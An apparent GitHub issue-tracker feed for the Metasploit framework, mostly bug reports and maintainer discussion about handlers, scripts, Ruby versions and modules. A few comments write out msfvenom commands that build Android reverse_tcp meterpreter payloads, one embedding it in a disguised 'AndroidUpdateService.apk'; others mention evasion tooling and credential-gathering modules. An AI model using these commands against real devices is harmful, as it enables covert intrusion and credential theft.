[2016-12-28 14:03] pbarry-r7 commented on #7471
Awesome, email received, thanks much!  I'm traveling this week, will circle back on this next week.  Cheers!!

[2016-12-28 16:50] #7745 closed

[2016-12-29 08:39] spidyyyy commented on #7755
-h is working but it is not creating the site
when i want to add asite using -a it is showing site not created error and
i tried using different ip's
what else to do?

On Wed, Dec 28, 2016 at 1:12 AM, Brent Cook <notifications@github.com>
wrote:

[2016-12-29 22:21] polloditu commented on #6272
Hello community !!

Listen I don't have a problem, but I have a questions that I haven't been able to figure out for myself and maybe an experienced user has been through the same and can help me .

The thing is that my payload only works on a certain Local IP on my system ( example 10.0.0.5 works , but 10.0.0.X doesn't ) . What is the reason for this ?  ... I'm using DDNS on the payload ( so I'm

[2016-12-29 22:47] OJ commented on #7709
I'll take a look at HEAD some time today and let you guys know @bwatters-r7 @dmaloney-r7.

[2016-12-30 00:24] OrtoNormale commented on #7659
Me too had the same problem.
All works good with LOCAL_IP but not working with PUBLIC_IP.

This is the command I use to create apk payload:

`msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.195 LPORT=4444 -x /home/roma/APK/good/AndroidUpdateService.apk -o /home/roma/APK/infected/AndroidUpdateService.apk --platform android -k -a dalvik -i 70`

Template apk is just a simple starting temp

[2016-12-30 21:36] h00die commented on #7558
Thanks @aushack for the original ticket references. linked them back to the to do list for reference.

[2016-12-30 22:04] Occupy4Elephants commented on #7471
awesome! thank you! xo

[2016-12-31 17:14] spidyyyy commented on #7755
On Thu, Dec 29, 2016 at 2:09 PM, NAMAN SHAH <naman.shah.prakash@gmail.com>
wrote:

[2016-12-31 18:03] h00die commented on #7755
@bcook-r7 was hoping you'd give some more details to better use his very busy time/dev schedule.  What would be useful is a copy paste of the commands, and their output.  Redacting client data as needed.  Maybe it wasn't working because you did `wmap_sites -a asdfasdfdsfs76686875875;;;::::::'''[-00`--`-`-`-`-`-`\n\n\n\n\n\`.  That would be easy to diagnose.  Maybe you put things in correctly, and

[2016-12-31 23:09] wvu-r7 commented on #7755
@spidyyyy: Is your database connected?

[2016-12-31 23:26] h00die commented on #7755
it wasn't on mine, however i'd argue that if that's a requirement, and hence why it wasn't able to create the site, it should say that in the error message

[2016-12-31 23:27] wvu-r7 commented on #7755
Already have a patch for it. Will push soon.

[2016-12-31 23:29] h00die commented on #7755
@wvu-r7 ![wvu](http://img.memecdn.com/superman-vs-the-foo_o_1254459.jpg "wvu")

[2016-12-31 23:43] #7755 closed

[2016-12-31 23:48] wvu-r7 commented on #7755
@spidyyyy: I'll reopen this if your bug is valid. However, I wasn't able to repro with a connected database. Make sure your IP is a valid one, though, since ```Rex::Socket.getaddress``` needs to pass.

[2017-01-01 02:36] GabrielTK commented on #6505
Any Update??

[2017-01-01 04:00] wvu-r7 commented on #6505
@GabrielTK casts thread necromancy! It has an immediate effect!

[2017-01-01 04:00] wvu-r7 commented on #6505
@GabrielTK: Oops, we forgot to implement this. I can take a look soon-ish. Happy New Year!

[2017-01-01 04:23] GabrielTK commented on #6505
Thanks. Happy New Year for you too!

Em 1 de jan de 2017 2:01 AM, wvu-r7 <notifications@github.com> escreveu:

@GabrielTK<https://github.com/GabrielTK>: Oops, we forgot to implement this. I can take a look soon-ish. Happy New Year!

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub<https://github.com/rapid7/metasploit-framework/issues/6505#issueco

[2017-01-02 15:07] stever123 opened #7777 "Cannot make AutoRunScript run msfconsole commands?"
## Steps to reproduce

How'd you do it?

1. ...
create an exploit with the payload cmd/unix/reverse_bash

## Expected behavior
Usually with meterpreter sessions you can use AutoRunScript to run modules etc but when using reverse_bash, unfortunately you cannot run any modules in the actual session so AutoRunScript seems to be pretty useless here. I Want to run the post/multi/manage/shell_to_meterpr

[2017-01-02 16:25] spidyyyy commented on #7755
ip is  valid but it still shows the message i am stuck here!! unable to
make site map -this is the error.

On Sun, Jan 1, 2017 at 5:18 AM, wvu-r7 <notifications@github.com> wrote:

[2017-01-02 16:31] h00die commented on #7755
have you pulled the latest copy from git?  There can be a time delay between a git commit and a release, then propagation to various platforms

[2017-01-02 16:34] spidyyyy commented on #7755
ok sure i am researching  on vulnerabilities now do you know about them?

On Mon, Jan 2, 2017 at 10:01 PM, h00die <notifications@github.com> wrote:

[2017-01-02 16:37] h00die commented on #7755
This ticket is only related to the bug.  Please only add on to this ticket if you believe the bug has not been properly fixed.

[2017-01-02 16:40] spidyyyy commented on #7755
its still not working properly
always shows the messaqe site not created!!!
what to do with that?

On Mon, Jan 2, 2017 at 10:07 PM, h00die <notifications@github.com> wrote:

[2017-01-02 16:40] spidyyyy commented on #7755
i have sent you my output .jpg file too!!!

On Mon, Jan 2, 2017 at 10:10 PM, NAMAN SHAH <naman.shah.prakash@gmail.com>
wrote:

[2017-01-02 17:08] h00die commented on #7755
https://github.com/rapid7/metasploit-framework/issues/7755#issuecomment-269993628

[2017-01-02 17:21] spidyyyy commented on #7755
whats the problem with that why it is not connecting with any site ?

On Mon, Jan 2, 2017 at 10:39 PM, h00die <notifications@github.com> wrote:

[2017-01-02 17:32] pedrib commented on #7742
See PR #7778

[2017-01-02 17:52] mubix opened #7779 "multi/meterpreter/reverse_https not functioning with web_delivery"
## Version Info

Master commit:
[code]

Relevant gems:
[code]

## Repo Steps

- Attacker: 192.168.80.105
- Victim 1 (WinXP): 192.168.80.21
- Victim 2 (Win 7): 192.168.80.22

### Set up web_delivery:

[code]

### Set up handler:
[code]

### Resulting Jobs:

[code]

All I see is this:
[code]

Also, generating payload didn't work in this setup either:
[code]

Results in:
[code]

[2017-01-02 18:00] mubix commented on #7779
Same went for the XP machine, also tried SCT serving on it and this is what I got:

### Setup:
[code]

Results in the following:

[code]

[2017-01-02 19:56] busterb commented on #7779
In both cases, PlatformList is ["Multi"] in the failing case when we try to assign it to the UUID. Seems like we can't determine the UUID on first connection for web_delivery, and falling back to platform isn't helping yet.

[2017-01-02 23:45] wvu-r7 commented on #7755
@spidyyyy: Is your database connected or not?

[2017-01-03 01:16] PsychoBit opened #7780 "Wrong requested Android permission"
Creating an Android APK payload with msfvenom tool
`msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=319 > bugged-app.apk`
and decompiling the output with `apktool d bugged-app.apk`, the seventh line of the "AndroidManifest.xml" file will request for an inexistent Android permission called "ACCESS_COURSE_LOCATION", maybe a typo written instead of the [right one](https://developer.an

[2017-01-03 04:07] bcook-r7 commented on #7780
Of coarse! Fix is here: https://github.com/rapid7/metasploit-payloads/pull/161  - thanks!

[2017-01-03 07:27] #7780 closed

[2017-01-03 23:15] egypt commented on #7759
How did you install? If you used the binary installers, you should be using the start menu shortcut instead of running from inside an existing cmd.exe.

[2017-01-03 23:25] busterb commented on #7759
I'd assume omnibus based on the path. I wonder if e:/ is an NTFS partition or FAT

[2017-01-03 23:36] egypt commented on #3997
Making ruby-readline work the same as real readline is a pretty hairy task that I really don't think is worth the effort involved. As a workaround, you can start `msfconsole` with the `-L` flag to use your system's readline, which makes (almost) everything work just like in bash.

[2017-01-03 23:36] #3997 closed

[2017-01-03 23:41] busterb commented on #7759
We really should update to Ruby 2.3.3 - it doesn't have fiddle to begin with anymore

[2017-01-03 23:56] egypt commented on #3792
`sessions -u` uses `post/multi/manage/shell_to_meterpreter` now. I don't know of any other places where a console command uses a script.

[2017-01-04 03:18] busterb commented on #7483
This sounds a lot like issues that we found while testing #7688

[2017-01-04 08:39] spidyyyy commented on #7755
its not connecting either!! shows an error with that too

[2017-01-04 14:56] wvu-r7 commented on #7755
You're doing it wrong.

[2017-01-04 15:00] egypt commented on #7757
I'm not convinced this is actually easy. The `RPORT` option type doesn't have a way to indicate TCP vs UDP and pulling that from reflection would be problematic. For one, not all modules that use TCP include the `Exploit::Remote::Tcp` mixin and likewise with UDP.

[2017-01-04 15:14] wvu-r7 commented on #7757
I assumed when y'all said it was easy, you meant searching for UDP mixins in the *file*. That wasn't exactly what I had in mind, and it doesn't help with the fact that we regularly perform mixinception.

[2017-01-04 15:21] wvu-r7 commented on #7757
On the flip side, I did drum up a little PoC using the ```ancestors``` method. It's not perfect, but it's purely code-based.

[2017-01-04 15:25] #7742 closed

[2017-01-04 15:48] wvu-r7 commented on #7757
Here's what it looks like with a single-level inclusion:

[code]

And with a two-level inclusion:

[code]

[2017-01-04 15:52] wvu-r7 commented on #7757
This basically handles zero edge cases right now.

[2017-01-04 20:28] wchen-r7 commented on #7779
I'm trying to repro this problem, but I didn't see the same error. What did I do wrong?

![repro](https://cloud.githubusercontent.com/assets/1170914/21657906/004057dc-d28a-11e6-914f-c2131cf0a68b.gif)

[2017-01-04 20:46] wchen-r7 commented on #7732
@jinq102030 I don't think this is a bug. The module is exploiting a servlet that serves an image. When the servlet finds the file requested by the attacker, it thinks it's serving an image. This allows the attacker use it to check if the file exists or not before we download it.

[2017-01-04 23:15] jinq102030 commented on #7732
Sounds good. Wish the author could attach a pcap (or HAR file).

[2017-01-04 23:15] #7732 closed

[2017-01-05 02:57] OJ commented on #7779
Yup, you need to use `multi/meterpreter/reverse_https` not `windows` :)

[2017-01-05 03:55] mubix commented on #7779
@wchen-r7 were you able to repo with multi ?

[2017-01-05 17:58] wchen-r7 commented on #7779
@mubix Unfortunately, yup:

[code]

[2017-01-05 22:26] wchen-r7 commented on #7448
Found the software. Working on this.

[2017-01-05 23:39] wvu-r7 commented on #7448
Great, thanks!

[2017-01-05 23:39] wvu-r7 commented on #7448
@wchen-r7: Where did you get it from?

[2017-01-06 01:04] wchen-r7 commented on #7448
Rapid7.

[2017-01-06 01:26] wvu-r7 commented on #7448
Oh, lol. I remember now. Thanks, Sebastian...

[2017-01-06 02:54] mubix opened #7789 "Clean up "scripts" directory"
This, me, week of 2017/01/17->?

- [ ] Make post modules out of any of the scripts that need to still be written as one
- [ ] Set expiration dates in all existing scripts
- [ ] Add powershell and python scripts directories

[2017-01-06 15:27] bwatters-r7 commented on #7709
@OJ....... cough, cough.  Youtwo! Youtwo! Lookuphere! Lookuphere!  (Let's see if you get the reference....)

[2017-01-06 16:51] egypt commented on #7789
[ ] rm all the scripts that already have a post module counterpart

[2017-01-06 23:10] wchen-r7 opened #7792 "Modules using cmd/unix/interact may cause msfconsole to freeze"
Modules using cmd/unix/interact may cause msfconsole to freeze. The exploit in this branch seems to demonstrate the problem:

https://github.com/wchen-r7/metasploit-framework/tree/cisco_cve_2016_6433

Platform is OS X

[2017-01-06 23:16] wchen-r7 commented on #7448
I have a module here:
https://github.com/wchen-r7/metasploit-framework/tree/cisco_cve_2016_6433

But it seems cmd/unix/interact is problematic. The nasty one is: https://github.com/rapid7/metasploit-framework/issues/7792

[2017-01-07 00:22] wvu-r7 commented on #7792
Confirmed here. Currently testing with ```cmd/unix/interact``` alone and not with ```Net::SSH```.

[2017-01-07 00:25] lastelement21 opened #7793 "send_sms fails due to incorrect command name"
## Steps to reproduce

How'd you do it?

1. Open android meterpreter session
2. send_sms -d ********* -t testing

## Expected behavior

[+] SMS sent - Transmission successful

## Current behavior

[code]
## System stuff

ADB debug output from request:

[code]

### Metasploit version

b074042b990bc0d4db6ca5d6eb85298d9ff9b7ee Bump version of framework to 4.13.13

### I installed Metasploit with:
- S

[2017-01-07 20:09] pedrib commented on #7084
@wvu-r7 @wweb-r7 this bug again.
Cropped up while building a new module. This time is a deal breaker because wget segfaults on the device, so we definitely need tftp!

Can you see if you can repro this on Ubuntu or Debian?

[2017-01-09 03:40] mubix opened #7799 "Feature Request: Stop plugins from being able to be loaded more than once"
Right now if you load a plugin more than once, msfconsole allows it and performs the actions specified in the plugin.

[code]

Not in a great place to record what happens but it double plays the audio. I'm not sure there is a reason why someone might want to double load a plugin, but if no one can think of one it would be nice to have it stop that from happening.

[2017-01-09 04:37] wvu-r7 commented on #7799
The power of muts compels you!

[2017-01-09 05:42] 765uyg opened #7800 "Error when using exploit(ms15_020_shortcut_icon_dllloader) ?"
## Steps to reproduce

[code]

## Expected behavior

exploit success

## Current behavior

[code]

## System stuff

### Metasploit version

Framework: 4.11.0-2014122301
Console  : 4.11.0-2014122301.15168

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [* ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
-

[2017-01-09 09:40] void-in commented on #7789
Following is the first go towards getting rid of the scripts directory.

Replacement of scripts inside the scripts/meterpreter directory:
[code]
Would appreciate if a committer find a mistake in the above list or a module is available for a script where I have written ```<empty>``` to edit it inline so that we can have a single point to refer to. For non committers who don't have the edit options,

[2017-01-09 11:20] sempervictus opened #7801 "Non-meterpreter handlers no longer work"
## Steps to reproduce

How'd you do it?

1. Generate a command shell or interpreted language payload
2. Start the corresponding handler
3. Execute the payload
4. Observe connected socket in netstat
5. Weep elephant tears because !shells

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim opera

[2017-01-09 11:51] void-in commented on #7801
@sempervictus I you sure it is not one of your custom settings messing up again?

I am not able to reproduce it at my end with the latest master.
[code]

[2017-01-09 11:55] sempervictus commented on #7801
Actually it seems that its neither - looks like Arachni is exhausting FDs in the background as evidenced by the inotify resource exhaustion messages i'm seeing trying to tail the framework.log:
[code]
We need better logging for the session handling issues, tracking these down sucks the donkey.
Thanks as always @void-in

[2017-01-09 11:55] #7801 closed

[2017-01-09 16:09] wwebb-r7 commented on #7084
I think we're both swamped at the moment, but I'll take a look at this sometime soon.

[2017-01-09 17:39] wchen-r7 opened #7802 "Msf::Exploit::AutoTarget#target_host overwrites Msf::Module::Network#target_host"
Originally I started off the problem with this backtrace:

[code]

The line that causes the backtrace is this:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/session.rb#L248

I asked @egypt about this, and we learned that target_host should be a string all the time, but if auto target kicks in, Msf::Exploit::AutoTarget#target_host returns a Mdm::Host object, not String.

[2017-01-09 17:47] busterb commented on #7802
CC: @dmaloney-r7

[2017-01-09 19:34] wchen-r7 commented on #7448
PR for this issue is: https://github.com/rapid7/metasploit-framework/pull/7803

[2017-01-09 20:17] #7743 closed

[2017-01-09 21:29] egypt commented on #7799
I don't think it's unreasonable to force an unload when the user `load`s a plugin with an already-loaded name.

[2017-01-09 21:31] wvu-r7 commented on #7799
After going through about four different ways to "solve" this apparently intended but quirky behavior, I think that's the sanest thing to do. PR coming up soon...

[2017-01-09 21:41] wvu-r7 commented on #7799
This is fun: ```afplay data/sounds/default/try_harder.wav & !# !# !# !# !# !# !#```.

[2017-01-09 21:52] wvu-r7 commented on #7799
Btw, the issue is that you can create duplicate session subscribers. I think this is expected behavior, but it is a little strange when you're playing sounds. Forcing an unload should clean up an existing subscriber before adding a new one.

[2017-01-10 00:34] pedrib commented on #7084
Ok this is weird.. on a Kali installation I don't have this problem. The server also binds to :::69, but I can connect to it from a remote host with ipv4 (confirmed with wireshark). What the hell is going on here?? No iptables funny business on my host OS...

[2017-01-10 04:20] bcook-r7 commented on #7084
This is due to an obscure feature of some common IPv6 stacks (Linux included), where depending on the value of the socket option 'IPV6_V6ONLY', an IPv6 socket also listens on IPv4 by default.

Whether it is the system default depends on the system. On Linux systems, it can be configured by a sysctl or procfile entry, on OpenBSD, it does not even exist (this is obviously a security issue to have su

[2017-01-10 04:22] bcook-r7 commented on #7084
Mettle actually uses this feature for its server support, but I should remove it probably since it's not necessarily portable or desirable. https://github.com/rapid7/mettle/blob/master/mettle/src/network_server.c#L110 This is probably a hint at where in the tftp server implementation this is getting configured. I'll take a look now since this is kind of up my alley.

[2017-01-10 05:17] mubix commented on #7799
Anything we can register? or maybe just check to see if the specific plugin's class is loaded some how? I don't know enough about ruby to be able to tell if that's doable
[code]

[2017-01-10 10:06] busterb commented on #7084
This appears to have been implemented in 2007 with one of the first IPv6 patches to MSF: 83a8ece0225

This patch fixes it and makes it more correct I think (needs to be moved into rex-socket now):

[code]

[2017-01-10 12:26] pedrib commented on #7084
@busterb where is that file? It doesn't exist on my msf version?

[2017-01-10 12:47] pedrib commented on #7084
@busterb found the gem - spot on, it works now!

[2017-01-10 14:28] AshBringeR commented on #7759
There are no Start Menu shortcut after install via .bin

[2017-01-10 15:35] sagielevy opened #7807 "enum_chrome in post/windows/gather crashing and closing meterpreter session"
## Steps to reproduce
1. Open meterpreter session
2. Migrate to user privileged process
3. In meterpreter, enter "background"
4. use post/windows/gather/enum_chrome
5. set session (session id)
6. run

This only failed on a single rhost from the multiple I tried, not sure why or how.
This section should also tell us any relevant information about the
environment; for example, if an exploit that use

[2017-01-10 16:02] bcook-r7 commented on #7802
This seems like it was already addressed in #7791 - @wchen-r7 are you perhaps not testing HEAD ?

[2017-01-10 16:22] wchen-r7 commented on #7802
I'll double check.

[2017-01-10 17:09] wchen-r7 commented on #7802
@bcook-r7 @dmohanty-r7 It looks like this is no longer a problem. I'll close the ticket. Thanks.

[2017-01-10 17:09] #7802 closed

[2017-01-10 17:17] chintan121 commented on #7759
Do you have metasploit v4.12.22.msi setup file

[2017-01-10 17:18] wchen-r7 commented on #7792
This PR is using the same payload (but on a different platform), and is not hitting the problem: https://github.com/rapid7/metasploit-framework/pull/7808

[2017-01-10 17:22] ClearGateTeam opened #7809 "client.platform missing "windows"
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/met

[2017-01-10 17:22] #7809 closed

[2017-01-10 17:33] ClearGateTeam opened #7810 "client.platform missing "windows" platform"
## Steps to reproduce
1.	Get Meterpreter on Windows Server 2012 R2 with SYSTEM privileges.
2.	run enum_vmware or run process_memdump
3.	You’ll get “[-] This version of Meterpreter is not supported with this Script!”

How'd you do it?
Looking on the source code have both scripts shows that it will only run on “client.platform =~ /win32|win64”
Checking the variable with IRB shell throws “windows”. A

[2017-01-10 18:07] wvu-r7 commented on #7084
Wow, nice find!

[2017-01-10 18:08] wvu-r7 commented on #7799
There are a couple options right now if we want to force unloading: do it in ```PluginManager``` or do it in ```CommandDispatcher```. There's a caveat to unloading: you need to walk the plugin list either way.

I'm happy to submit a PR with the options laid out, and we can decide what's best going forward. The other *radical* option is to alter how we store session subscribers, which will fix the

[2017-01-10 18:28] void-in commented on #7810
Scripts are no longer supported and are deprecated in favor of post modules. As per my initial assessment in https://github.com/rapid7/metasploit-framework/issues/7789, the enum_vmware script don't have a corresponding post module at the moment. However you can use post/windows/gather/memory_grep instead of the process_dump script in order to dump and grep a pattern from a process memory.

[2017-01-10 18:30] wvu-r7 commented on #7810
Dang, right as I was about to comment, lol. Thanks, @void-in. Sorry, @ClearGateTeam. That is the correct fix, though. If you want to submit a patch, you're welcome to.

[2017-01-10 18:32] wvu-r7 commented on #7810
[code]

[2017-01-10 18:35] void-in commented on #7810
@wvu-r7 You and me have this tendency to pick and comment on an issue at the same time :)

[2017-01-10 18:35] ClearGateTeam commented on #7810
I'm not that familiar with the inner works of Metasploit.

Is there a reason why the client.platform is windows instead of win32 or win64?

[2017-01-10 18:41] wvu-r7 commented on #7810
Yeah, one sec.

[2017-01-10 18:42] wvu-r7 commented on #7810
I think it was #7507, @ClearGateTeam. Scripts have been deprecated for literally years now, btw. If you heard about them from Metasploit Unleashed, the advice is a bit dated.

[2017-01-10 18:43] wvu-r7 commented on #7810
If you're not comfortable submitting a patch, I could fix this quickly, but then there'd be 74 other fixes to make, too... So do we fix these as we go or ```rm``` all of them? :P

[2017-01-10 18:46] wvu-r7 commented on #7810
I think scripts are still useful, but they've largely been outmoded by post modules. While we don't have complete feature parity between the two, we'd like that to happen before we move on scripts.

[2017-01-10 18:46] ClearGateTeam commented on #7810
In my opinion as there are scripts that don't have a corresponding post module yet, it would be great if you can add windows to all of them, what do you think?

p.s - @void-in , I don't think memory_grep post module will assist me as I want to dump the entire memory of a process and not part of it.

[2017-01-10 18:48] wvu-r7 commented on #7810
@ClearGateTeam: Adding ```windows``` to all of them isn't as simple as a search and replace, though. Scripts will need to be refactored. 59 of them, to be exact. That's putting a lot of time into something that's already deprecated. I think we can fix these as we go. What do you think?

[2017-01-10 18:50] ClearGateTeam commented on #7810
ok. didn't know that

[2017-01-10 18:54] void-in commented on #7810
@wvu-r7 For those scripts which have the exact functionality available in the post modules. we can literally rm-ed them and there won't be any functionality lost. I am working on the exact functionality parity you mentioned in https://github.com/rapid7/metasploit-framework/issues/7789 to make sure everything is documented when the time comes to get rid of these scripts.

[2017-01-10 18:55] wvu-r7 commented on #7810
@void-in: Great, thank you. Just trying to be sensitive to people's workflows. :)

[2017-01-10 19:00] wvu-r7 commented on #7810
@ClearGateTeam: No idea if this would work or not, but notice how it's not a simple search/replace:

[code]

If that took me 5 minutes, and there are 74 other changes to make, then it would take me approximately 6 hours to fix all the scripts, assuming no breaks and consistent complexity, only for the scripts to be removed in the future. No thanks. :(

[2017-01-10 19:06] ClearGateTeam commented on #7810
@wvu-r7 thank you for the explanation.

I just didn't understand yet what is the meaning of `windows` , can you explain ?

[2017-01-10 19:06] wvu-r7 commented on #7810
There are some false positives in there, and I rounded down on the time, but you get the point!

[2017-01-10 19:07] wvu-r7 commented on #7810
@ClearGateTeam: Did you read #7507, which I linked above?

[2017-01-10 19:08] ClearGateTeam commented on #7810
@wvu-r7 not yet.

[2017-01-10 19:11] wvu-r7 commented on #7810
Well, in short, ```arch``` already contains the arch, such as ```ARCH_X86```. No need to put it in ```platform``` like ```win32```, so ```windows``` became the new thing. It's more consistent, it's more correct, and it allows for new features @OJ has been working on.

[2017-01-10 19:12] wvu-r7 commented on #7810
(That's my personal understanding. Please correct me if you had other reason, @OJ. :)

[2017-01-10 19:12] wvu-r7 commented on #7810
(That's my personal understanding. Please correct me if you had other reasons, @OJ. :)

[2017-01-10 21:20] OJ commented on #7810
Checking for `client.platform == 'windows'` isn't enough these days either :) Having the platform set to `windows` rather than `win32`, for example, was done for a few reasons. The main one being that arch was already in the `client.arch`, and so was rather redundant. However, the platform can be set to `windows` for `php` and `python` payloads as well. If you want to check for a native meterprete

[2017-01-10 21:57] ClearGateTeam commented on #7810
@OJ ok I understand

[2017-01-10 22:28] wvu-r7 commented on #7810
I'm closing this out. If you feel the need to update the two scripts, @ClearGateTeam, send a patch! It's pretty easy. :)

[2017-01-10 22:28] #7810 closed

[2017-01-10 22:30] OJ commented on #7709
@bwatters-r7 I just did some more testing then and this does look at lot better. Thanks!

[2017-01-10 22:30] #7709 closed

[2017-01-11 15:38] vysec opened #7813 "MS09-050 Not working?"
## Steps to reproduce

How'd you do it?

[code]

The exploit doesn't work, I've tried windows/adduser and all other payloads. The box just BSODs.

## Expected behavior

Shell or add user

## Current behavior

BSOD

## Version

Using github version of Metasploit on Kali Sana.

[2017-01-11 15:39] vysec commented on #7813
Can someone check to see if it works for them?

[2017-01-11 18:33] vysec commented on #7813
May be an issue on our side, I'll update when we figure it out.

[2017-01-11 18:39] #7793 closed

[2017-01-11 18:41] #7084 closed

[2017-01-11 18:45] #7552 closed

[2017-01-11 21:39] wchen-r7 commented on #7792
Tried the same exploit using cmd/unix/interact from Kali, and I got a seg fault:

![screen shot 2017-01-11 at 3 38 06 pm](https://cloud.githubusercontent.com/assets/1170914/21867517/258a054e-d814-11e6-89d4-881ff0c6587c.png)

[2017-01-11 22:10] anthraxx opened #7814 "incompatibility with ruby 2.4 (various problems)"
## Steps to reproduce

Running metasploit with ruby 2.4 fails because of incompatibilities in the locked dependencies.

## Expected behavior

Metasploit should also work with ruby 2.4.

## Current behavior

There are multiple problems when trying to use with ruby 2.4.
The first one is the json gem, that ca be temporarily worked around by using the 1.8 branch via git, an issue is already open here:

[2017-01-11 22:46] wvu-r7 commented on #7448
Resolved in #7803.

[2017-01-11 22:46] #7448 closed

[2017-01-11 23:01] wvu-r7 commented on #7814
Why aren't you using RVM or rbenv? We're not on 2.4 yet.

[2017-01-11 23:05] anthraxx commented on #7814
well, because I'm the package maintainer and package metasploit for Arch Linux so its installable easily from the package manager.... and has to use the system ruby for that.

[2017-01-11 23:06] egypt commented on #7814
If I'm not mistaken, rails doesn't support 2.4 until rails 5, so none of the active* deps will work without a bunch of upgrade work. It will have to happen eventually, but we probably won't be able to prioritize it for a while yet.

In the mean time, you can work around this by using a compatible ruby through rvm or rbenv

[2017-01-11 23:07] anthraxx commented on #7814
Well I can't as mentioned, that would basically mean it won't work from the package manager on Arch Linux until its resolved :cry:

[2017-01-11 23:15] wvu-r7 commented on #7814
Ahh, you're the package maintainer for Metasploit. On Arch. I'm sorry. :(

[2017-01-11 23:15] egypt commented on #7814
@anthraxx Ah, I hadn't seen your earlier response. That's unfortunate. Is it possible to add a ruby 2.3 package for backwards compatibility?

[2017-01-11 23:19] busterb commented on #7814
@anthraxx feel free to pitch in with the upgrade to Rails 5 if you would like to move Metasploit to Ruby 2.4.

In the mean time, it looks like the Rails community is backporting 2.4 support, but it will take time. It doesn't happen for free.

[2017-01-11 23:53] #7777 closed

[2017-01-11 23:54] stever123 opened #7816 "shellcode_inject/virtual + ddns + reverse_tcp_dns very unstable?"
## Veil-Evasion version
2.28.2

## OS Used - all info (architecture, linux flavor, etc)
Linux 2016.2

Steps i did:
1. Went to veil-evasion python file
2. "use 28" for shellcode_inject/virtual
3. "msfconsole"
4. "generate"
5. Set the payload to windows/meterpreter/reverse_tcp_dns (have also tried without "_dns")
6. set the lhost to a ddns where the ports are open
7. used macroshop to get the code i

[2017-01-12 00:33] stever123 commented on #7816
Comment from Veil-Evasion: "However, if you are using msfvenom to generate your shellcode, and the shell code isn't working as you expect it, then that is a MSF issue vs. a veil issue (since we just take the shellcode directly from msf output)" - Chris

[2017-01-12 00:34] OJ commented on #7816
Does the msf-generated shellcode work outside of Veil?

[2017-01-12 00:58] stever123 commented on #7816
What do you mean? I create the msf-generated shellcode veil-evasion and then I am setting up the listener for that shellcode in msfconsole and it is here where the listener and the shellcode never makes contact... And this approach works exactly as expected when using static ip addresses :-/

[2017-01-12 02:39] wvu-r7 commented on #7814
How about AUR, @anthraxx? It's been a while since I've run Arch, but I did find this: https://aur.archlinux.org/packages/ruby2.3/.

[2017-01-12 05:03] greenhand2learn opened #7817 "firefox_creds module problem"
[code]

the module post/multi/gather/firefox_creds, it will download the creds from firefox, but there is a problem, if the user is root, it will go to /home/root/.mozilla/firefox/, but the directory doesn't exists. if the user is normal user, it will return OK

[2017-01-12 05:10] wvu-r7 commented on #7817
```/home/root```, wat?

[2017-01-12 07:28] void-in commented on #7817
@wvu-r7 I think the root case is handled correctly. https://github.com/rapid7/metasploit-framework/blob/fd1c5fbce774328d03e712ecf833bdd9681d1df2/modules/post/multi/gather/firefox_creds.rb#L253. I will test it at my end as well to make sure everything works correctly.

There is another problem with the module as well. The line https://github.com/rapid7/metasploit-framework/blob/fd1c5fbce774328d03e7

[2017-01-12 07:35] wvu-r7 commented on #7817
I remember working on that module. It's a disaster of complexity.

[2017-01-12 07:54] jwed opened #7818 "Outlook credentials module problem"
Hi,

I tried to use outlook module on Windows 7 to get the credential but it's show me a message that's tell

[code]

what does this message mean and how can I get the credential in this case !!

Metasploit version: 4.12.23-dev

### I installed Metasploit with:
- [x] Kali package via apt

### OS
- Kali linux

Thank you

[2017-01-12 08:40] FireFart commented on #7814
fyi: I also got gem install errors on other ruby based projects when trying to build `nokogiri` because of the removed `FixNum` and `BugInteger`. So this can maybe also cause problems if it's not fixed yet.

[2017-01-12 10:32] anthraxx commented on #7814
@wvu-r7 well i can make it work locally with AUR, but thats custom user content and does not help for our official binary repos... so locally i can of cause also use rvm or rbenv :laughing:
I will see if i can temporarily move ruby2.3 into the binary repos, but for us that's really ugly and the last resort. Thanks all for your feedbacks, appreciated.
AFAIK rails and other stuff are indeed backport

[2017-01-12 10:59] vysec commented on #7813
OK Doesn't seem to work, digging out Kali 1.0 VM.

[2017-01-12 11:14] stever123 commented on #7816
Actually whn using the reverse_tcp_dns payload, then it seems to be REALLY unstable because when the listener actually sees the connection, then I cannot upload a file etc. without the session will crash...

[2017-01-12 11:38] stever123 commented on #7816
For example,  try to upload a file that is about 400 kb in size and it gets "operation time out"

[2017-01-12 14:41] anatol commented on #7814
`json` released version 1.8.5 with ruby-2.4 support. Please bump the version in `Gemgile.lock`.

[2017-01-12 15:03] bcook-r7 commented on #7814
the json bump will happen automatically in about 27 hours.

[2017-01-12 20:36] bcook-r7 opened #7824 "Random rspec failures with leaked constants"
## Steps to reproduce

This happens frequently now with PRs running specs in travis:

[code]

How'd you do it?

Submit a PR on master, note travis failure randomly, e.g. :
https://travis-ci.org/bcook-r7/metasploit-framework/jobs/191426683

## Expected behavior

Specs pass

## Current behavior

Specs randomly fail.

[2017-01-12 22:07] #7824 closed

[2017-01-13 00:55] h00die commented on #7818
a little more detail may help someone determine the problem.
What version of Outlook is installed?  Is it set to use Exchange, or other provider?

[2017-01-13 01:36] ChrisFernandez commented on #7814
glad you guys are working on this.. my distro install broke. Cant wait to get changes from upstream thanks <3

[2017-01-13 17:34] wvu-r7 commented on #7818
Looks like your Outlook...
😎
Isn't installed.

[2017-01-13 20:16] jwed commented on #7818
@h00die
the Outlook version is 2007,
and about the exchange I'm using the default setting with Hotmail mails.

[2017-01-13 20:17] jwed commented on #7818
@wvu-r7
I don't think so I'm already accessing my emails.

[2017-01-13 23:24] #7799 closed

[2017-01-14 12:12] h00die commented on #7818
Follow this registry out and see where it doesn't match: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/outlook.rb#L72

[2017-01-15 07:05] hktalent opened #7828 "how "workspace" display hosts Number services Number"
how "workspace" display

workspace   hostsNumber servicesNumber
eg
workspace          hostnum  servicsnum
 php                      30         3232
  szswdx               332       3435333
  szjc                      22          99

